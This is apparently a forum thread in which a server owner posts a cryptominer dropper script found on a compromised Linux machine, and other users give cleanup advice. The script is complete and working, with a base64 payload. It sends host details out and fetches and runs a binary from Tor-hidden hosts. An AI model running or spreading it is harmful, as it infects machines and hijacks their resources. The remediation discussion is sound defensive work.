#!/bin/bash
exec &>/dev/null
echo ncM85D4kux95mCiJpO2bEuK6pSDgAxyo8iDwzI2aeW4D9rutGHUWkn85gtzMkzxU
echo bmNNODVENGt1eDk1bUNpSnBPMmJFdUs2cFNEZ0F4eW84aUR3ekkyYWVXNEQ5cnV0R0hVV2tuODVndHpNa3p4VQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI0aXVjaWd4dmxmeDR2Y3FuNXNvcmRlcnNhYTNhM3p0amNhb3N6cHR4eG81YjNwYm42bmx3c2ZhZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgZG5zLmRucy1vdmVyLWh0dHBzLmNvbSB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2guY2VudHJhbGV1LnBpLWRucy5jb20gZG9oLmRucy5zYiBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyBkbnMuZmxhdHVzbGlmaXIuaXMgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTEzKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8c29ydCAtdVJ8aGVhZCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdG1wIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmZXhlCmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdCB0b3Iyd2ViLmlvIHRvcjJ3ZWIuc3Ugb25pb24uY29tLmRlIHRvcjJ3ZWIudG8gb25pb24uc2gKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgp1ICR0LiRoCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash
crontab 里这个 20 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &
清理 crontab 是没用的。
1
uncat 2020-09-02 21:44:49 +08:00
这个文件: /root/.systemd-service.sh 的内容是上面这个?
|
2
uncat 2020-09-02 22:28:50 +08:00
搜索一下一个类似于这样的进程: e4133fc85b74c4a791611e2ced190609 (预计是 33 个字符组成) kill 掉它
|
3
uncat 2020-09-02 22:43:27 +08:00 1
https://www.cnblogs.com/royfans/p/12722792.html 这篇文章很类似可以参考一下.
|
4
ward56 2021-01-21 10:11:29 +08:00 1
根据以往经验,这是一个挖矿子进程的脚本,需要 base64 解码,一般解码出来就是请求一个 url 及一些优化你系统的脚本,你不需要去分析它的内容。
主进程一般在 /etc/cron.d/0systemd 1 子进程 .systemd-service.sh 隐藏脚本 2 子进程 根目录下的某个目录下 systemd-service.sh 脚本 解决方法: 1. find 上述 3 个进程脚本和计划任务,删除掉 2.找到上述系统上对应的恶意程序 kill 掉 3.用 lsof 找到 /proc 内存里已经删除源脚本的进程杀掉 4 ./bin/ 下的所有命令不要执行,尤其 url culr wget 等命令,找一个健康的干净系统,把系统里 /bin 下命令还原覆盖到这个系统里。 验证: 重启操作系统,观察一个周期确定是否进程还会启动 |
5
nimab OP @ward56 上个月又中一次,清掉了,主要就是删掉进程,封掉那些 url,一个多月再没出现。现在问题就是内存使用比之前高一些,找不到原因。
|
6
ward56 2021-01-21 11:34:50 +08:00
@nimab 封掉 url 治标不治本,实际挖矿木马有休眠期,不会一直运行。
其它健康的服务器,你可以给 openssh 加固,该打补丁的打补丁,该加策略的加策略。 已经中招的服务器按照我发的方法做一遍,关键点是找到对应的 /proc 里的进程对应的程序。(封掉 url 之后非常难定位问题,建议放行 url,把问题爆露出来,全面分析下) 思路就这么简单,你再尝试深挖 linux 进程会变得更有趣。 现在的挖矿木马太多,主要以下大类: 初版的 linux 挖矿程序通过 计划任务执行 crontab 里 进阶版的 linux 挖矿程序通过 1.隐藏文件运行,或者通过加密的脚本。 2.脚本内容一般是重命名的 cur 或 wge 拉取外网的脚本或程序 3.然后删除本地运行的源程序 最终实现,无本地运行程序方式实现挖矿。 高级进阶版 入侵系统之后,先给系统做全面性能优化 包含;内核参数优化 / 性能优化(杀掉占用资源过高的程序,你自己运行的服务) 没有计划任务跑挖矿程序,没有链接公网需求,一次非守护运行。 |